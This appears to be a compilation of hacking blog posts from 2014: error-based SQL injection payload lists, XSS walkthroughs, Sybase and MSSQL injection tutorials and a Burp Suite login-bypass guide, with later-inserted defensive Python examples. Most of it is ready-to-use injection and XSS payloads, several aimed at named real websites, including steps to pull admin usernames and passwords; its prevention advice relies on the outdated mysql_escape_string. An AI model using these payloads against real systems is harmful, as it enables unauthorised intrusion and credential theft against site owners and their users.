Friday, 12 December 2014

Error Based SQL Injection Guide

As you may know, there are several different methods of error-based injection. I know there have been a few tutorials lately, but I always love showing you guys something new. I'm going to go over a few different queries you can use.

Method 1

Let's start with some Double Query.

Version

+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(version()+as+char),0x7e))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Tables

+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

You can change the table schema to get the tables out of your specified database by converting your DB name to hex and using the following query.

+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=0xDATABASEHEX+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Getting The Database Names

+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(schema_name+as+char),0x7e))+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Columns

+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+table_name=0xTABLEHEX+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Data

+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(COLUMN1,0x7e,COLUMN2)+as+char),0x7e))+from+TABLENAME+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

To get data out of a different database, use this query.

+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(COLUMN1,0x7e,COLUMN2)+as+char),0x7e))+from+DATABASENAME.TABLENAME+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Method 2

This is standard Error Based Injection.

Version

+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--

Tables

+or+1+group+by+concat_ws(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--

The same rule applies: you can get the tables out of a different database by changing the schema.

+or+1+group+by+concat_ws(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=0xDATABASEHEX+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--

Columns

+or+1+group+by+concat_ws(0x7e,(select+column_name+from+information_schema.columns+where+table_name=0xTABLEHEX+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--

Getting Data From The Columns

+or+1+group+by+concat_ws(0x7e,(select+concat(COLUMN1,0x7e,COLUMN2)+from+TABLENAME+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--

Method 3

These are harder error-based methods that you shouldn't go into unless the ones above don't work.

Tables

+and+(select+count(*)+from+(select+1+union+select+null+union+select+!1)x+group+by+concat((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2)))--

Columns

+and+(select+count(*)+from+(select+1+union+select+null+union+select+!1)x+group+by+concat((select+column_name+from+information_schema.columns+where+table_name=0xTABLEHEX+limit+0,1),floor(rand(0)*2)))--

Data

+and+(select+count(*)+from+(select+1+union+select+null+union+select+!1)x+group+by+concat((select+concat(COLUMN1,0x7e,COLUMN2)+from+TABLENAME+limit+0,1),floor(rand(0)*2)))--

Method 4

Here's another method that's not very common.

Tables
parameter[]=(@:=1)||@+group+by+concat((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),0x7e,!@)+having+@||min(@:=0)--

Columns
parameter[]=(@:=1)||@+group+by+concat((select+column_name+from+information_schema.columns+where+table_name=0xTABLEHEX+limit+0,1),0x7e,!@)+having+@||min(@:=0)--

Data
parameter[]=(@:=1)||@+group+by+concat((select+concat(COLUMN1,0x7e,COLUMN2)+from+TABLENAME+limit+0,1),0x7e,!@)+having+@||min(@:=0)--

Method 5

Another method, pretty basic.

Tables
+and+(select+1+from+(select+count(*),concat(floor(rand(0)*2),0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1))x+from+information_schema.tables+group+by+x)a)--

Columns
+and+(select+1+from+(select+count(*),concat(floor(rand(0)*2),0x7e,(select+column_name+from+information_schema.columns+where+table_name=0xTABLEHEX+limit+0,1))x+from+information_schema.tables+group+by+x)a)--

Data
+and+(select+1+from+(select+count(*),concat(floor(rand(0)*2),0x7e,(select+concat(COLUMN1,0x7e,COLUMN2)+from+TABLENAME+limit+0,1))x+from+information_schema.tables+group+by+x)a)--

Method 6

Here's another method, I don't see it used much.

Tables
+and+row(1,1)>(select+count(*),concat((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),0x7e,floor(rand(0)*2))x+from+(select+1+union+select+null+union+select+!1)x+group+by+x+limit+0,1)--

Columns
+and+row(1,1)>(select+count(*),concat((select+column_name+from+information_schema.columns+where+table_name=0xTABLEHEX+limit+0,1),0x7e,floor(rand(0)*2))x+from+(select+1+union+select+null+union+select+!1)x+group+by+x+limit+0,1)--

Data
+and+row(1,1)>(select+count(*),concat((select+concat(COLUMN1,0x7e,COLUMN2)+from+TABLENAME+limit+0,1),0x7e,floor(rand(0)*2))x+from+(select+1+union+select+null+union+select+!1)x+group+by+x+limit+0,1)--

Method 7

Here's another method, using subselects with aliases.

+and+(select+*+from+(select+*+from+information_schema.tables+join+information_schema.tables+x)a)--

Duplicate column name 'TABLE_CATALOG'


This will work almost as a limit, getting you column names one by one.

+and+(select+*+from+(select+*+from+TABLENAME+as+x+join+TABLENAME+y+using+(COLUMN_NAME))as+z)--

So mine looks like this:

+and+(select+*+from+(select+*+from+information_schema.tables+as+x+join+information_schema.tables+y+using+(TABLE_CATALOG))as+z)--

Duplicate column name 'TABLE_SCHEMA'


That's it for now, I'll try and update this when I learn more methods of error based injection.




Prevention of SQL Injection


This explanation will provide insight into what goes on behind the scenes, rather than copying and pasting queries that make no sense to you.

Part 1: What is SQLi?


SQLi is short for SQL injection. It's caused by attackers sending remote SQL queries to the web server. These attackers have an opening when strings aren't properly escaped.

First off, let's take a look at some vulnerable code.

In order to SELECT information to be displayed on a page, you first need to establish a connection with the MySQL server.

connect.php

<?php
$host = "127.0.0.1"; // MySQL Host
$user = "root";  // MySQL User
$pass = "";  // MySQL Password
$db = "PHP";  // MySQL Database

$login = mysql_connect($host,$user,$pass); // Login using the variables above.

if ($login) {  /* If login is successful*/
mysql_select_db($db) /*Select the database given above*/
or die(mysql_error()); /*Cancel the page, showing an error as to what went wrong*/
} else { /*Or Else*/
echo "Error!"; /*Display a custom error message*/
}


This code here is not vulnerable; it's simply a connection to the database.

Now this part is where the vulnerability comes in.

<?php
include('connect.php'); // Include the login configuration.

if(isset($_GET['id'])) { // If the $_GET request 'id' is set
$id = $_GET['id']; // Copy the raw, unescaped GET parameter
$sql = "SELECT * FROM news WHERE id='$id'"; // Build the query by splicing the parameter straight into the SQL string
$query = mysql_query($sql) or die(mysql_error()); // Send the query, or show the MySQL error if something went wrong.
while ($row = mysql_fetch_array($query)) { // Loop over the result rows
echo $row['title']; // Display the row 'title' from the database on the page.
}
}
?>

Now that we have all that understood, the site will fetch data using the $_GET parameter.
For example:

http://localhost/PHP/news.php?id=

This will return the selected row in my PHP code above, WHERE my id parameter is 1 (id is the first column in my news table).
Now everything will be normal: the data will echo onto the page with no problem. However, this allows an attacker to execute remote SQL queries via the $_GET parameter (id), because it is not escaped properly.

For example...

http://localhost/PHP/news.php?id=1' AND (1)=(1)-- x

This changes the SQL query to the following:
$sql = "SELECT * FROM news WHERE id='1' AND (1)=(1)-- x"; // String Based Blind SQL Injection


http://localhost/PHP/news.php?id=1' AND EXTRACTVALUE(RAND(),CONCAT('~',version()))-- x
The new query becomes the following:

$sql = "SELECT * FROM news WHERE id='1' AND EXTRACTVALUE(RAND(),CONCAT(0x7e,version()))-- x";
XPATH syntax error: '~5.5.36'


This is critical: as you can see, it allows anyone to select information from your database.

http://localhost/PHP/news.php?id=1' DIV(0) UNION SELECT 1,CONCAT_WS('~',username,password),3 FROM admin LIMIT 0,1-- x

The query becomes the following:

$sql = "SELECT * FROM news WHERE id='1' DIV(0) UNION SELECT 1,CONCAT_WS('~',username,password),3 FROM admin LIMIT 0,1-- x";
admin~lol123 


Now there are tons of ways to prevent SQL injection. Here's probably one of the easiest, using mysql_escape_string:

<?php
function sanitize($data){
$data = mysql_escape_string(trim($data));
return $data;
}

if (isset($_GET['id'])){
$id = sanitize($_GET['id']);
$sql = "SELECT * FROM news WHERE id='$id'";
$query = mysql_query($sql) or die(mysql_error());

while ($row = mysql_fetch_array($query)){
echo $row['title'];
}
}
?>


Now your parameter is properly escaped. Thanks for taking the time to read; I hope you guys learned a few things.



Thursday, 29 May 2014

CROSS SITE SCRIPTING (XSS)



What is XSS?

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications that enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted for roughly 80.5% of all security vulnerabilities documented by Symantec as of 2007.[1] Their effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner. (explanation from Wikipedia)

Let’s XSS


XSS is not just pasting XSS attack vectors into search boxes and address bars; you have to know where that input is going, how it is being parsed, etc. If you want to learn how to find XSS holes on pages, you first need at least basic knowledge of HTML, JavaScript and a little bit of PHP. So in this paper I will go over some XSS-vulnerable websites from XSSed.com, and we will be reviewing the source code of those vulnerable websites. My main goal is to show you how to properly build your XSS attack vector.



I will not:
1. Show you how to steal cookies
2. Take responsibility for your actions after you read this paper.


http://www.un.lk/media_centre/press_releases.php?id=XSSTest 

Let's try changing the number to something else, for example id=XSSTest. We see that no error is shown, so we can assume that the web page has accepted our input; let's see where in the source our XSSTest string is located.



Source of [http://www.un.lk/media_centre/press_releases.php?id=XSSTest ] :





Great, in both examples we are already inside JavaScript.


But this doesn't prove anything; let's see whether <> gets encoded, so next we go:
[www.un.lk/media_centre/press_releases.php?id=<script>]

Source of [www.un.lk/media_centre/press_releases.php?id=<script>] :

Great, our input is not being encoded; if it were, we would have &lt;script&gt;
instead of <script>.

I will show you 2 options for exploiting it:

1. jshow(<script>): here you can see we
are already inside the JavaScript, so we can just do

Code:
www.un.lk/media_centre/press_releases.php?id=alert(0)


and our alert box will be executed. Why, you ask? Look at the source code:

Our alert box is taken as valid input and processed by the browser, and there you have the alert box. onload= is a JavaScript event that fires when the page is loaded, so when you call it as onload="JavaScript goes here", everything inside the onload event is processed as script, and so is our alert(0).

2. Every element on a web page has its opening [ < ] and closing [ > ] tag.
);jshow(<script>);"> As you can see, the closing is done with );">, so it goes like this: alert(0) );">. So for our XSS to work we must close the body tag and start a new <script> tag. In this case we use:

Code:
www.un.lk/media_centre/press_releases.php?id=);"><script>alert(0)</script>


<script language="javascript" type="text/javascript" defer="defer">

news_toggle_visibility(<script>);

</script>

To escape the tag we use );</script><script>alert(0)</script> (we closed the existing <script> with );</script> and started a new one with <script>alert(0)</script>).


The URL is:

Code:
http://www.un.lk/media_centre/press_releases.php?id=);</script><script>alert(0)</script>

Or we can do this:

Code:
http://www.un.lk/media_centre/press_releases.php?id=);</script><script>alert(0)</script><script>alert(12

We just added the <script>alert(12 vector, and );</script> closed our injected script tag.

Code:
http://www.chip.de/ii/grossbild_v2.html?sales=2122


Time to review the code. After searching for the value 2122 inside the source code we get:

As you can see, like in our first example we are already inside a <script> tag, but in this case we have to close the value and input new JavaScript code. In our case we have "2122"; so the first part of our XSS vector will be "; . So let's try "; alert(0);

Code:
http://www.chip.de/ii/grossbild_v2.html?sales="; alert(0);


As you can see we are inside the script, but no alert box is shown. Why is that? It's because of the "; after our XSS attack vector: every value assigned to a variable has an opening " and a closing ", and in our case we have closed the somtr.prop48=" value with ";, but there is a "; left unclosed. You can see the problem: the first value is closed, but what about the third "? We have to close it too, so our XSS link will be:
Code:
http://www.chip.de/ii/grossbild_v2.html?sales="; alert(0); Acid="XSS


So lets see the source :

As you can see we closed the third " and our alert box is shown. So the rule is: try to close either every tag or every value with your XSS attack vector. You will have fewer errors on the page you are XSSing, and your XSS vector will look cooler.

Code:
http://www.bhtelecom.ba/korisnicki_portal.html?&no_cache=1 [POST][Self XSS]


Self-XSS is an XSS attack that is triggered when the user enters the payload into the vulnerable input box; it takes social engineering (SE) for this type of XSS. Unlike the GET method, where we can see our XSS payload in the address bar of our browser, the POST method won't show you what the web page is sending to the server, so we have to use tools to see what POST values we are sending to the server. We can use:

1. Live HTTP headers [http://www.youtube.com/watch?v=bz7KGhraX-0 ]
2. BurpSuite Proxy [lookup Hooded Robin’s tut on that]

Here we have two input boxes, one says "Login ili mobitel" and the other "Lozinka", so let's input something into those two input boxes and press the OK button.
Let's input Text"<>/\ in the "Login ili mobitel" field and Text2"<>/\ in the "Lozinka" field. We get an error, but let's see where our input went; here is the source:




What happened:

"> ---- that closed the src value in the open iframe tag:

<iframe src="https://portal.bih.net.ba/amserver/UI/Login?Login.Token1=sss&Login.Token2=\">

</iframe> ---- closed iframe tag :

<iframe src="https://portal.bih.net.ba/amserver/UI/Login?Login.Token1=sss&Login.Token2=\"></iframe>

<script>alert(0)</script> --- new script tag with alertbox

And that's it: we escaped the iframe tag with "></iframe> and added a new script tag <script>alert(0)</script>. To hide any errors use either

1. "></iframe></div><script>alert(0)</script><!-- (comments out the rest of the code)
2. "></iframe></div><script>alert(0)</script><iframe> (figure it out)

And now, maybe you think that XSS attacks can't do any damage, but big companies like Google and Facebook have reward programs for XSS findings on their sites, because XSS attacks can be used to steal users' cookies [http://jehiah.cz/a/xss-stealing-cookies-101 ], and when you consider that big companies have millions of users, a vulnerability like XSS can have a devastating effect.
So let's analyze a Google XSS vulnerability which was found by ElvinGuitar, a user from HackForums.net:

Vuln. link :

Code:
https://www.google.com/voice/rates?p=
Lets try :
Code:
https://www.google.com/voice/rates?p=XSSTest

We get the same page, so our input is accepted; now let's review the code:


Here is our input. Let's evaluate how we can exploit it: first we notice we are inside the script, and we have '); as the first part of our XSS attack vector, so let's do this

Code:
https://www.google.com/voice/rates?p='); alert(0);</script>
So this is the result:

<script>
var callingRatesPage = new _callingRatesPage(
'en',
'USD','';); alert(0);</script>');
callingRatesPage.render(document.getElementById('calling-rates-page'));
</script>

We closed the value with ');, added our alert(0); call, closed the script tag with </script>, and we get our alert box.

Seems easy, doesn't it? Well, ElvinGuitar got $1000 for that XSS.

And now facebook :

Code:
http://www.facebook.com/ads/create/photos/creative_uploader.php?controller_id=c4c288b438ed080&path=whatever&src=whatever&vol=90&w=60&h=80&post_upload=1
So here is one piece of advice: try searching for the values from the URL inside the source code. In this case we would search for the c4c288b438ed080 value, and this is what we get. You should also search for every value after an = in the URL and see where it's located. Here is the source code:

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry["c4c288b438ed080"].saveUploadedImage("whatever", "whatever", 90, 60, 80);});
...
</script>

Nice, so let's replace c4c288b438ed080 with Test<>"\/ and we get this:

Code:
http://www.facebook.com/ads/create/photos/creative_uploader.php?controller_id= Test<>\/&path=whatever&src=whatever&vol=90&w=60&h=80&post_upload=1
And the source code :

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry["Test<>\/ "].saveUploadedImage("whatever", "whatever", 90, 60, 80);});
...
</script>

Great, our input is not being encoded, so we see we are inside the {[ ]}; brackets, so we have to close that value with MaXoNe"]}; alert(0); // and so the URL will be:

Code:
http://www.facebook.com/ads/create/photos/creative_uploader.php?controller_id=acid"]}; alert(0); // &path=whatever&src=whatever&vol=90&w=60&h=80&post_upload=1
And source code:

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry["MaXoNe"]};alert(0); //"].saveUploadedImage("whatever", "whatever", 90, 60, 80);});
...
</script>

What happened? Well, "]}; closed the value, alert(0); triggered our alert box, and // comments out the rest of the code all the way to the </script>.

We could use this too :

Code:
http://www.facebook.com/ads/create/photos/creative_uploader.php?controller_id=MaXoNe"]}; alert(0); </script><!--&path=whatever&src=whatever&vol=90&w=60&h=80&post_upload=1
The difference is that we closed the script tag and commented out the rest of the code, like this:

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry["MaXoNe"]};alert(0); </script><!--"].saveUploadedImage("whatever", "whatever", 90, 60, 80);});
...
</script>

The rest of the line after <!-- is commented out.

And this one I found on the EA Games site:

Code:
http://www.ea.com/search?q=

So lets try :
Code:
http://www.ea.com/search?q=Test<>/\"


And let's see what we got:
We see that <> is filtered (deleted) but " is not being encoded. Now we know that we can escape the value of title=" ", so the first part of our XSS payload is ". What can we do next? First, we can't use < >, so no script, img, body or any other tag, but we are inside the <h1> tag, which is the heading, and there are JavaScript events that can be used on almost every HTML element, like:

onmouseover= runs JavaScript when the user moves the mouse over the HTML element the event belongs to.

onclick= runs JavaScript when the user clicks the HTML element the event belongs to.

ondblclick= runs JavaScript when the user double-clicks the HTML element the event belongs to.

onmouseout= runs JavaScript when the cursor leaves the area of the HTML element the event belongs to.

So we can do this :

Code:
http://www.ea.com/search?q="onclick="alert('MaXoNe');""



With " we escaped the value and added the onclick=alert("MaX"); event, and with the next " we closed the value that was left behind; or we can use " onclick=alert("MaX"); //.
With // we comment out the rest of the code all the way to >. So when we click the heading we get an alert box.

SQLi and XSS

URL from zerofreak’s SQLi tutorial on HF.

Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11--


There are vulnerable columns shown on the page; we will select column 8, so let's see the source:

We will use :

Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,'</font><script>alert(/acid/)</script><font>',9,10,11--
Look at the source and figure it out , it’s time for you to do something.

Or if magic_quotes is enabled we can bypass it by hex-encoding our value:

Code:
http://www.armorysquareofsyracuse.com/main/shopping.php?id=179 and false union /*!select*/ 1,2,0x3c2f7469746c653e3c7363726970743e616c6572742830293c2f7363726970743e,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--

Where 3c2f7469746c653e3c7363726970743e616c6572742830293c2f7363726970743e is </title><script>alert(0)</script>.
Again, review the source to find out why I used this payload.

That's all from me. My advice: go to XSSed.com, look at the mirrors, search the code, try different XSS payloads, be creative.
Also, if you want to be a good XSSer, master HTML and JavaScript; there is no other way.
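The defensive counterpart to the contexts walked through above, as an added example that is not code from the original post or from any of the sites named: the same payloads rendered through context-specific output encoding, so that a value lands inside a JavaScript string, an event-handler attribute or a plain attribute without being able to close it. The render_* templates are assumed stand-ins for the pages' real markup; the encoder supplies the quote delimiters, so the templates add none of their own.

```python
import html
import json

# Characters json.dumps leaves literal but which could still end a <script>
# block or an HTML attribute: emit them as JavaScript \uXXXX escapes instead.
_JS_EXTRA = {ord(c): "\\u%04x" % ord(c) for c in "<>&'/`"}


def js_string_literal(value: str) -> str:
    """Double-quoted JavaScript string literal that evaluates back to value.

    json.dumps escapes the quote, backslash, control characters and (with
    ensure_ascii) every non-ASCII character including U+2028/U+2029; the
    translate step then neutralises </script>, entities and single quotes.
    """
    return json.dumps(value, ensure_ascii=True).translate(_JS_EXTRA)


def html_attr(value: str) -> str:
    """Encode a value for use between double quotes in an HTML attribute."""
    return html.escape(value, quote=True)


# Stand-ins (assumed, not the sites' real templates) for the three contexts
# discussed above. Each placeholder is filled by the encoder, which also
# supplies the quotes, so the template itself must not add any.

def render_onload(param: str) -> str:
    # un.lk: script inside an event-handler attribute. JS-encode first, then
    # attribute-encode, because the browser HTML-decodes the attribute value
    # before the JavaScript engine ever sees it.
    return '<body onload="jshow(%s)">' % html_attr(js_string_literal(param))


def render_script_var(param: str) -> str:
    # chip.de, Google, Facebook: a string literal inside a <script> block.
    return "<script>somtr.prop48=%s;</script>" % js_string_literal(param)


def render_title(param: str) -> str:
    # ea.com: a plain HTML attribute value.
    return '<h1 title="%s">' % html_attr(param)


# The payloads quoted in the sections above.
PAYLOADS = [
    ');"><script>alert(0)</script>',
    '"; alert(0); Acid="XSS',
    "'); alert(0);</script>",
    'MaXoNe"]}; alert(0); //',
    '"onclick="alert(\'MaXoNe\');""',
]


def still_contained(param: str) -> bool:
    """True when both encoded forms round-trip and cannot close their context."""
    lit = js_string_literal(param)
    attr = html_attr(param)
    return (
        json.loads(lit) == param                 # JS literal still means the same
        and not set(lit) & set("<>&'/`")         # nothing that ends a tag or string
        and html.unescape(attr) == param         # attribute value still means the same
        and not set(attr) & set('<>"\'')         # nothing that ends the attribute
    )


if __name__ == "__main__":
    for p in PAYLOADS:
        print(still_contained(p), render_onload(p))
```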

Sybase SQL injection Tutorial


Hey guys, today I will make a small tutorial on error-based Sybase SQL injection (that is its name, I guess).

So here we start with a site... I'm assuming you understand MySQL injection.

http://www.okfarmbureau.org/index.php?ac...&rowid=630

Put a ' at the end and you will see this:
Sybase: Server message: Unclosed quote before the character string ' '

Now to get the version:

Code:
http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert%28integer,@@version%29-- 

So here is the version:

Adaptive Server Enterprise/15.0.1/EBF 13819/P/Sun_svr4/OS 5.8/ase1501/2379/64-bit/FBO/Tue Aug 15 04:20:15 2006

Now let's get some table names.


Code:
http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name)+from+sysobjects where type='U'))-- 

Second table:

Code:
http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name)+from+sysobjects where type='U' and name!='boardMembers'))-- 

Basically, keep adding and name!='table name that you get'.

Here I guess I reached the end of the tables:

Code:
http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name)+from+sysobjects where type='U' and name!='boardMembers' and name!='events' and name!='galleries' and name!='galleries_photos' and name!='gallery' and name!='gallery_photos' and name!='newsletters' and name!='newsletters_new' and name!='newsreleases' and name!='offices' and name!='publication_import' and name!='publications' and name!='publications_new' and name!='radio' and name!='satellites' and name!='titles')) 


Time to get columns. We will get the columns of boardMembers.

Code:
http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name) from syscolumns where id=(select id from sysobjects where type='U' and name='gallery')))-- 
Column no. 1:
city

Getting column 2:

Code:
http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name) from syscolumns where id=(select id from sysobjects where type='U' and name='gallery' ) and name!='city'))-- 

You get my point: just add and name!='column name you get'.

That is how I know it... If I am wrong about anything, please correct me.

MSSQL asp SQL INJECTION

OK guys, I'm going to give you a tutorial on SQL injection; this is written by me!

SQL injection on ASP is the same as on PHP, with a few small changes.

So first of all we will find some site that is vulnerable and runs on .asp.

So assume that you have a site with the name
Code:
http://www.target.com/
Now find a page where the site is vulnerable to SQL injection.

You can check for the vulnerability by adding a single quotation mark '
at the end of the URL, like
Code:
http://www.target.com/product.asp?id=13'

If you get this error...

Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'department_id=1024''.

/deptdet.asp, line 122

Then this means the site is vulnerable to SQL injection. Now we are going to find the number of columns. Normally we use -- at the end of the string, but in this case we will be using #.

Code:
http://www.target.com/product.asp?id=13 order by 1#
Suppose that the site has 10 columns. When you use the query "order by 1#" (without double quotations)
you will not get any error; the page will load normally. But when you use the query "order by 11#" (without double quotations) you will get an error, which means that the site has 10 columns.

So we will have an error on this query:
Code:
http://www.target.com/product.asp?id=13 order by 11#

But when we use this query, we will not get any error.

Code:
http://www.target.com/product.asp?id=13 order by 10#
This tells us that the table has 10 columns.

Now we will write the query as...

Code:
http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10#
So now in the next step we need the name of a table to find the visible columns. Let me explain a bit: in simple SQL injection we use union select 1,2,3,4,5,6 -- and get a number back that we can use to pull information from the site, but here we need a table name before that number will show.

So to get that number we are going to add the name of a table after union select 1,2,3,4,5,6,7,...,10.

Here, scripts for getting table names usually don't work (I tried some of them), so we will add table names manually; common table names are admin, tbladmin, tbl_admin, user, users, login, info, email, etc. Suppose on the site we find an admin table that is visible. Now our URL will look like
Code:
http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10 from admin#

After this we will get the numbers of the visible columns, which we can use to get data from the site. Suppose we got columns 3, 6 and 7 visible...

So now we are going to use 3 to get information. All we have to do is put the name of a column in place of the 3 in the string and we will get the username and password.

Now our URL will look like
Code:
http://www.target.com/product.asp?id=13 union select 1,2,name,4,5,6,7,8,9,10 from admin#
Suppose we get a username instead of the number 3.

Then change the column name to the name of the passwords column
and you will get the password ;)
URL will be like
Code:
http://www.target.com/product.asp?id=13 union select 1,2,passwords,4,5,6,7,8,9,10 from admin#
Hope this helped you. In this type of injection we don't get many working scripts for listing tables etc.; if I find working ones I will update this tutorial soon... enjoy!!

BURP SUITE SQL AUTHENTICATION BYPASS

Today I am going to extend my previous tutorial, where I introduced you to the Burp Suite tools, so that we can now audit login forms for SQL authentication bypass vulnerabilities. This is a common problem found daily in the wild where PHP and MySQL are used as the authorization mechanism, based on dynamic SQL queries completed from user input supplied through the login form. This can be time consuming and repetitive to conduct manually, but it is relatively easy to audit, and after reading this it will be even easier, especially with Burp! I will first provide an explanation of the problem and of what allows the vulnerability to be exploited, followed by an example, so here goes…

As mentioned above, authentication bypass vulnerabilities often occur due to a lack of filtering of user-supplied input. If we review a quick example of code from a PHP/MySQL authentication page we will begin to see things more clearly. You can find some test samples with a quick Google dork “file:php/asp inurl:admin/login”, but here is a sample login to keep it easy:


Code:
<?php
// Both form fields are spliced straight into the SQL text, unfiltered.
$sql = "SELECT * FROM users WHERE username='" . $_POST['username'] . "' AND password='" . $_POST['password'] . "'";
$response = mysql_query($sql);
?>

This code fails to filter or check the user-supplied input. As a result, the query the target system runs reads like so:

Code:
SELECT * FROM users WHERE user='' AND password=''


Since this is not filtered or checked, we will pick a username and use SQL injection in the second field. Let us assume we choose the username “webadmin” and the SQL injection: ' OR 'x' = 'x

This is now how the query looks that will get passed through:

Code:
SELECT * FROM users WHERE user='webadmin' AND password='' OR 'x' = 'x'


This is how the target system actually reads & parses the request:

Code:
SELECT * FROM users WHERE user='webadmin' AND TRUE
The ultimate goal here is to use our SQL injection to alter the SQL query so that it is fooled into letting us in. This works, as you can see above, because 'x' is always going to be equal to 'x', so the condition always returns TRUE, and thus the system grants us webadmin access to walk right in through the front door without any real password.

Alternative injections to the one above include:

  • ' or '1'='1
  • ' or 'x'='x
  • ') or ('x'='x
  • ') or ('1'='1
  • …etc

Some customization may be needed to fit your specific needs (sometimes injections need to be placed in both fields; sometimes more complex syntax is needed, or HEX or Char encoding, etc.). You could easily build your own list, but I have gone ahead and put together a decent list to help get you started. The list can be found in the "AuthBypass/auth-bypass.txt" file, which is included in my full download here: HR's Burp Starter Pack.
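The fix for both the news.php lookup in the prevention section and the login query above is the same: send the value as a bound parameter instead of splicing it into the SQL text. The following is an added example (not code from the original posts) that shows the two vulnerable queries beside their parameterized forms, using Python's sqlite3 module in place of PHP/MySQL and constructed tables in place of the real ones.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the `news` and `users` tables above."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE news(id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO news VALUES (1, 'first'), (2, 'second'), (3, 'third');
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('webadmin', 'correct-horse');
        """
    )
    return con


def news_titles_vulnerable(con: sqlite3.Connection, raw_id: str) -> list:
    # Same construction as news.php: the request parameter is spliced into the
    # SQL text, so a quote in it ends the literal and -- comments out the rest.
    sql = "SELECT title FROM news WHERE id='%s'" % raw_id
    return [row[0] for row in con.execute(sql)]


def news_titles_safe(con: sqlite3.Connection, raw_id: str) -> list:
    # Placeholder binding: the value travels separately from the SQL text, so
    # quotes and comment markers inside it are compared as data, never parsed.
    return [row[0] for row in con.execute("SELECT title FROM news WHERE id=?", (raw_id,))]


def login_vulnerable(con: sqlite3.Connection, user: str, pw: str) -> bool:
    # Same shape as the login snippet: username='...' AND password='...'.
    sql = "SELECT 1 FROM users WHERE username='%s' AND password='%s'" % (user, pw)
    return con.execute(sql).fetchone() is not None


def login_safe(con: sqlite3.Connection, user: str, pw: str) -> bool:
    row = con.execute(
        "SELECT 1 FROM users WHERE username=? AND password=?", (user, pw)
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    for payload in ("1' AND (1)=(1)-- x", "' OR '1'='1"):
        print(repr(payload), news_titles_vulnerable(db, payload), news_titles_safe(db, payload))
    bypass = "' OR 'x' = 'x"
    print(login_vulnerable(db, "webadmin", bypass), login_safe(db, "webadmin", bypass))
```

In PHP the equivalent is a PDO or mysqli prepared statement with bound parameters, which also avoids the connection-charset dependence of mysql_escape_string used in the prevention section.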

Now with Burp Suite:
Now rather than try each potential SQL statement or injection we place all of our potential injections into a single file and then let Burp run the requests in an automated fashion. This will help to save you time, as well as allow easier parsing of the results in a systematic way. In order to do this we simply submit a bogus request with arbitrary data submitted (user: foo, pass: bar). 


[Image: 62672264.png]

[Image: 28054744.png]

[Image: 21137854.png]

We then load up the request and send it to the Intruder tool to build our attack. We clear the default injection points and specifically set them around our password field or both user and password fields. You will choose the Sniper or Battering Ram attacks for this method, depending on how you want to test the form. You will then need to set the payload to run your auth-bypass.txt file. You can add some additional inspection items to the grep field if you want. I find it is often helpful to add some basic text you might see upon failed or successful login attempts (welcome, success, failed, wrong, etc).


